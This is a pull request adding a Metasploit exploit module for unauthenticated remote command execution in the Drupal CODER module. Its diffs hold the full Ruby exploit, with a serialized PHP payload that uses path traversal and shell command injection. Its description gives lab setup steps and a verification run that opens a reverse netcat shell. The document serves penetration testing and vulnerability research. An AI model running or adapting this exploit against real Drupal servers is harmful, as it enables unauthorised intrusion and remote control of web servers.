### PR TITLE
Add Drupal CODER Remote Command Execution Module

### DIFF
--- a/modules/exploits/unix/webapp/drupal_coder_exec.rb
+++ b/modules/exploits/unix/webapp/drupal_coder_exec.rb
@@ -80,10 +80,10 @@ class MetasploitModule < Msf::Exploit::Remote
     p << 's:10:"extensions";a:1:{s:3:"php";s:3:"php";}'
     p << 's:5:"items";a:1:{i:0;a:3:{s:7:"old_dir";s:12:"../../images";'
     p << 's:7:"new_dir";s:'
-    p << (payload.encoded.length + 4).to_s
+    p << (payload.encoded.length + 5).to_s
     p << ':"-v;'
     p << payload.encoded
-    p << ';";s:4:"name";s:4:"test";}}}'
+    p << ' #";s:4:"name";s:4:"test";}}}'
     payload = "data://text/plain;base64,#{Rex::Text.encode_base64(p)}"
     send_request_cgi(
       'method' => 'GET',

--- a/modules/exploits/unix/webapp/drupal_coder_exec.rb
+++ b/modules/exploits/unix/webapp/drupal_coder_exec.rb
@@ -36,9 +36,9 @@ class MetasploitModule < Msf::Exploit::Remote
       'Privileged'     => false,
       'Payload'        =>
         {
-          'Space'       => 225,
+          'Space'       => 250,
           'DisableNops' => true,
-          'BadChars'    => "\x00\x2f",
+          'BadChars'    => "\x2f",
           'Compat'      =>
             {
               'PayloadType' => 'cmd',
@@ -80,10 +80,10 @@ class MetasploitModule < Msf::Exploit::Remote
     p << 's:10:"extensions";a:1:{s:3:"php";s:3:"php";}'
     p << 's:5:"items";a:1:{i:0;a:3:{s:7:"old_dir";s:12:"../../images";'
     p << 's:7:"new_dir";s:'
-    p << (payload.encoded.length + 14).to_s
-    p << ':"f --help && '
+    p << (payload.encoded.length + 4).to_s
+    p << ':"-v;'
     p << payload.encoded
-    p << ' #";s:4:"name";s:4:"test";}}}'
+    p << ';";s:4:"name";s:4:"test";}}}'
     payload = "data://text/plain;base64,#{Rex::Text.encode_base64(p)}"
     send_request_cgi(
       'method' => 'GET',

--- a/modules/exploits/unix/webapp/drupal_coder_exec.rb
+++ b/modules/exploits/unix/webapp/drupal_coder_exec.rb
@@ -55,7 +55,7 @@ class MetasploitModule < Msf::Exploit::Remote
       [
         OptString.new('TARGETURI', [true, 'The target URI of the Drupal installation', '/']),
         OptString.new('SRVHOST', [true, 'Bogus web server host to receive request from target and deliver payload']),
-        OptString.new('SRVPORT', [true, 'Bogus web server port to listen']),
+        OptString.new('SRVPORT', [true, 'Bogus web server port to listen'])
       ]
     )
   end
@@ -97,7 +97,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'uri' => normalize_uri(target_uri.path, 'sites/all/modules/coder/coder_upgrade/scripts/coder_upgrade.run.php'),
       'encode_params' => false,
       'vars_get' => {
-          'file' => get_uri
+        'file' => get_uri
       }
     )
     stop_service

--- a/modules/exploits/unix/webapp/drupal_coder_exec.rb
+++ b/modules/exploits/unix/webapp/drupal_coder_exec.rb
@@ -1,0 +1,105 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::Remote::HttpServer
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => 'Drupal CODER Module Remote Command Execution',
+      'Description'    => %q{
+        This module exploits a Remote Command Execution vulnerability in
+        Drupal CODER Module. Unauthenticated users can execute arbitrary command
+        under the context of the web server user.
+
+        CODER module doesn't sufficiently validate user inputs in a script file
+        that has the php extension. A malicious unauthenticated user can make
+        requests directly to this file to execute arbitrary command.
+        The module does not need to be enabled for this to be exploited
+
+        This module was tested against CODER 2.5 with Drupal 7.5 installation on Ubuntu server.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Nicky Bloor',                         # discovery
+          'Mehmet Ince <mehmet@mehmetince.net>'  # msf module
+        ],
+      'References'     =>
+        [
+          ['URL', 'https://www.drupal.org/node/2765575']
+        ],
+      'Privileged'     => false,
+      'Payload'        =>
+        {
+          'BadChars' => "\x00\x2f",
+          'Compat'         =>
+            {
+                'PayloadType' => 'cmd',
+                'RequiredCmd' => 'netcat netcat-e'
+            },
+        },
+      'Platform'       => ['unix'],
+      'Arch'           => ARCH_CMD,
+      'Targets'        => [ ['Automatic', {}] ],
+      'DisclosureDate' => 'Jul 13 2016',
+      'DefaultTarget'  => 0
+      ))
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'The target URI of the Drupal installation', '/']),
+        OptString.new('SRVHOST', [true, 'Bogus web server host to receive request from target and deliver payload']),
+        OptString.new('SRVPORT', [true, 'Bogus web server port to listen']),
+      ]
+    )
+  end
+
+  def check
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'sites/all/modules/coder/coder_upgrade/scripts/coder_upgrade.run.php'),
+    )
+    if res && res.code == 200
+      Exploit::CheckCode::Vulnerable
+    else
+      Exploit::CheckCode::Safe
+    end
+  end
+
+  def on_request_uri(cli, _request)
+    print_status("Incoming request detected...")
+    p = ''
+    p << 'a:6:{s:5:"paths";a:3:{s:12:"modules_base";s:8:"../../..";s:10:"files_base";s:5:"../..";s:14:"libraries_base";s:5:"../..";}'
+    p << 's:11:"theme_cache";s:16:"theme_cache_test";'
+    p << 's:9:"variables";s:14:"variables_test";'
+    p << 's:8:"upgrades";a:1:{i:0;a:2:{s:4:"path";s:2:"..";s:6:"module";s:3:"foo";}}'
+    p << 's:10:"extensions";a:1:{s:3:"php";s:3:"php";}'
+    p << 's:5:"items";a:1:{i:0;a:3:{s:7:"old_dir";s:12:"../../images";'
+    p << 's:7:"new_dir";s:'
+    p << (payload.encoded.length + 14).to_s
+    p << ':"f --help && '
+    p << payload.encoded
+    p << ' #";s:4:"name";s:4:"test";}}}'
+    print_status("Sending payload...")
+    send_response(cli, p)
+  end
+
+  def exploit
+    start_service
+    send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'sites/all/modules/coder/coder_upgrade/scripts/coder_upgrade.run.php'),
+      'encode_params' => false,
+      'vars_get' => {
+          'file' => get_uri
+      }
+    )
+    stop_service
+  end
+end

--- a/modules/exploits/unix/webapp/drupal_coder_exec.rb
+++ b/modules/exploits/unix/webapp/drupal_coder_exec.rb
@@ -7,7 +7,6 @@ class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
   include Msf::Exploit::Remote::HttpClient
-  include Msf::Exploit::Remote::HttpServer
 
   def initialize(info={})
     super(update_info(info,
@@ -27,7 +26,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'License'        => MSF_LICENSE,
       'Author'         =>
         [
-          'Nicky Bloor',                         # discovery
+          'Nicky Bloor <nick@nickbloor.co.uk>',  # discovery
           'Mehmet Ince <mehmet@mehmetince.net>'  # msf module
         ],
       'References'     =>
@@ -55,9 +54,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     register_options(
       [
-        OptString.new('TARGETURI', [true, 'The target URI of the Drupal installation', '/']),
-        OptAddress.new('SRVHOST', [true, 'Bogus web server host to receive request from target and deliver payload']),
-        OptPort.new('SRVPORT', [true, 'Bogus web server port to listen'])
+        OptString.new('TARGETURI', [true, 'The target URI of the Drupal installation', '/'])
       ]
     )
   end
@@ -67,15 +64,14 @@ class MetasploitModule < Msf::Exploit::Remote
       'method' => 'GET',
       'uri' => normalize_uri(target_uri.path, 'sites/all/modules/coder/coder_upgrade/scripts/coder_upgrade.run.php'),
     )
-    if res && res.code == 200
+    if res && res.body.include?('file parameter is not setNo path to parameter file')
       Exploit::CheckCode::Appears
     else
       Exploit::CheckCode::Safe
     end
   end
 
-  def on_request_uri(cli, _request)
-    print_status("Incoming request detected...")
+  def exploit
     p = ''
     p << 'a:6:{s:5:"paths";a:3:{s:12:"modules_base";s:8:"../../..";s:10:"files_base";s:5:"../..";s:14:"libraries_base";s:5:"../..";}'
     p << 's:11:"theme_cache";s:16:"theme_cache_test";'
@@ -88,20 +84,14 @@ class MetasploitModule < Msf::Exploit::Remote
     p << ':"f --help && '
     p << payload.encoded
     p << ' #";s:4:"name";s:4:"test";}}}'
-    print_status("Sending payload...")
-    send_response(cli, p)
-  end
-
-  def exploit
-    start_service
+    payload = "data://text/plain;base64,#{Rex::Text.encode_base64(p)}"
     send_request_cgi(
       'method' => 'GET',
       'uri' => normalize_uri(target_uri.path, 'sites/all/modules/coder/coder_upgrade/scripts/coder_upgrade.run.php'),
       'encode_params' => false,
       'vars_get' => {
-        'file' => get_uri
+        'file' => payload
       }
     )
-    stop_service
   end
 end

--- a/modules/exploits/unix/webapp/drupal_coder_exec.rb
+++ b/modules/exploits/unix/webapp/drupal_coder_exec.rb
@@ -41,8 +41,8 @@ class MetasploitModule < Msf::Exploit::Remote
           'BadChars'    => "\x2f",
           'Compat'      =>
             {
-              'PayloadType' => 'cmd',
-              'RequiredCmd' => 'netcat netcat-e'
+              'PayloadType' => 'cmd cmd_bash',
+              'RequiredCmd' => 'netcat netcat-e bash-tcp'
             },
         },
       'Platform'       => ['unix'],

--- a/modules/exploits/unix/webapp/drupal_coder_exec.rb
+++ b/modules/exploits/unix/webapp/drupal_coder_exec.rb
@@ -37,11 +37,13 @@ class MetasploitModule < Msf::Exploit::Remote
       'Privileged'     => false,
       'Payload'        =>
         {
-          'BadChars' => "\x00\x2f",
-          'Compat'         =>
+          'Space'       => 225,
+          'DisableNops' => true,
+          'BadChars'    => "\x00\x2f",
+          'Compat'      =>
             {
-                'PayloadType' => 'cmd',
-                'RequiredCmd' => 'netcat netcat-e'
+              'PayloadType' => 'cmd',
+              'RequiredCmd' => 'netcat netcat-e'
             },
         },
       'Platform'       => ['unix'],
@@ -54,8 +56,8 @@ class MetasploitModule < Msf::Exploit::Remote
     register_options(
       [
         OptString.new('TARGETURI', [true, 'The target URI of the Drupal installation', '/']),
-        OptString.new('SRVHOST', [true, 'Bogus web server host to receive request from target and deliver payload']),
-        OptString.new('SRVPORT', [true, 'Bogus web server port to listen'])
+        OptAddress.new('SRVHOST', [true, 'Bogus web server host to receive request from target and deliver payload']),
+        OptPort.new('SRVPORT', [true, 'Bogus web server port to listen'])
       ]
     )
   end
@@ -66,7 +68,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'uri' => normalize_uri(target_uri.path, 'sites/all/modules/coder/coder_upgrade/scripts/coder_upgrade.run.php'),
     )
     if res && res.code == 200
-      Exploit::CheckCode::Vulnerable
+      Exploit::CheckCode::Appears
     else
       Exploit::CheckCode::Safe
     end


### PR DESCRIPTION
This module exploits CODER module for Drupal 7.x . Patch was released several days ago by Drupal Security Team.
## Limitation I've seen During Exploitation

1-) Our payload will be passed through too many different PHP functions, such as mkdir() etc. Thus, payload **can't** be bigger than 250+ char. Otherwise, mkdir() will throw warning! and execution will be terminated before reaching coder_upgrade_make_patch_file() function where we actually exploits the app.

2-) We **can't** use \x00 and \x2f  in our payload because first one is null byte and second one is path delimiter which cause troubles for mkdir() or copy() functions.

3-) We need to start bogus web server and it must be accessible by our target so we can delivery our payload -serialized PHP array-. I tried to make this clear with custom SRVHOST and SRVPORT messages because of people are usually use 0.0.0.0 . Please share if you want to know better way to make it easier for user.

I've tried to obey coding standart and stuff what I've learn during #7108 . I would like to hear your suggestions & comments to make this module better. Please feel free to say anything you want 👍
## Installation

Since Kali has upgraded their PHP version to 7.0, this might be trouble for Drupal 7.0 . So my suggestion is use PHP 5.x 
- Download and install Drupal ([https://ftp.drupal.org/files/projects/drupal-7.5.tar.gz](https://ftp.drupal.org/files/projects/drupal-7.5.tar.gz))
- Download CODER module and extract it under the **sites/all/modules/** folder. ([https://ftp.drupal.org/files/projects/coder-7.x-2.5.tar.gz](https://ftp.drupal.org/files/projects/coder-7.x-2.5.tar.gz))
- Give coder folder a write permission with chmod -R 777 coder/ . It needs this permission for its operation as well (creating .patch, memory_dump.txt files etc)
- Don't need to install it from Drupal administrator panel. Vulnerability can be triggered even it's not installed.
## Verification

List the steps needed to make sure this thing works
- [x] Start `msfconsole`
- [x] `use exploit/unix/webapp/drupal_coder_exec`
- [x] `set RHOST 10.0.0.159`
- [x] `set TARGETURI /drupal/
- [x] `check`
- [x] **Verify** the `[+] 10.0.0.159:80 The target is vulnerable` message in console.
- [ ] `set SRVHOST 10.0.0.1`and `set SRVPORT 8081` . This variables are going to used for bogus web server for payload delivery. So they must be reachable from target.
- [x] `set payload cmd/unix/reverse_netcat`
- [x] `exploit
- [ ] **Verify** `Meterpreter session X opened...` prompted on your terminal. 
- [x] Connect to the created session `session -i X`
- [x] **Verify** the `id` and `pwd` command output.

<img width="800" alt="screen shot 2016-07-21 at 16 40 00" src="https://cloud.githubusercontent.com/assets/4004716/17032706/552319fe-4f83-11e6-86fd-ac7c51ce13e4.png">
